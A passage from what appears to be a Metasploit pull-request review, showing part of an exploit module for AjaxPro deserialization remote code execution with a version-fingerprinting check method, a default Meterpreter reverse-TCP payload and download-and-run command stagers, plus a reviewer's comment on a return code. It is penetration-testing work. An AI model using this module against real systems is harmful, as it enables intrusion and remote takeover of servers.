modules/exploits/windows/http/ajaxpro_deserialization_rce.rb

```diff
@@ -0,0 +1,193 @@
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+                'CMDSTAGER::FLAVOR' => 'certutil'
+              },
+              'CmdStagerFlavor' => %w[vbs certutil debug_write debug_asm tftp psh_invokewebrequest curl wget lwp-request],
+              'Notes' => {
+                'SideEffects' => [SCREEN_EFFECTS, IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [SCREEN_EFFECTS, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to AjaxPro Handler', '/ajaxpro/']),
+      OptString.new('Namespace', [true, 'Namespace of vulnerable method', 'AjaxPro.Services.ICartService,AjaxPro.2']),
+      OptString.new('Method', [true, 'Name of vulnerable method', 'AddItem']),
+      OptString.new('Parameter', [true, 'Name of vulnerable parameter', 'item'])
+    ])
+
+    @ajax_pro = { ID: 'AjaxPro' }
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'core.ashx'),
+      'keep_cookies' => true
+    )
+    unless res
+      return CheckCode::Unknown("Target did not respond to #{normalize_uri(target_uri.path, 'core.ashx')}")
+    end
+
+    unless res.code == 200 && res.headers['Content-Type'].include?('application/x-javascript')
+      return CheckCode::Safe('Is not AjaxPro?')
+    end
+
+    unless (cap = res.body.match(/ID: ?"(\S+?)",/).captures)
+      return CheckCode::Detected('Failed to get AjaxPro ID.')
+    end
+
+    @ajax_pro[:ID] = cap[0]
+
+    unless (cap = res.body.match(/version: ?"(\S+?)",/).captures)
+      return CheckCode::Detected('Failed to get AjaxPro version.')
+    end
+
+    @ajax_pro[:version] = cap[0]
+
+    if Rex::Version.new(@ajax_pro[:version]) >= Rex::Version.new('21.10.30.1')
+      return CheckCode::Safe("AjaxPro version #{@ajax_pro[:version]} is not vulnerable.")
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, datastore['Namespace'] + '.ashx'),
+      'keep_cookies' => true
+    )
+    unless res
+      return CheckCode::Appears('Failed to check if the target method exists.')
+    end
+
+    unless res.code == 200 && res.body.match(/#{datastore['Method']}: ?function ?\((\S+?, ?)*#{datastore['Parameter']}(, ?\S+?)*\) ?\{/)
+      return CheckCode::Appears("But method '#{datastore['Method']}' with parameter '#{datastore['Parameter']}' was not found in namespace '#{datastore['Namespace']}'")
+    end
+
+    CheckCode::Vulnerable("Confirmed target method exists and the AjaxPro version (#{@ajax_pro[:version]}) is vulnerable.")
```

Comment:
I believe this should be `Appears` based on the documentation:

https://github.com/rapid7/metasploit-framework/blob/df47814029b9b9e53ae7a3fec7cb1f723fa5b9d8/docs/metasploit-framework.wiki/How-to-write-a-check-method.md?plain=1#L23-L32

Reply:
Modified as you said.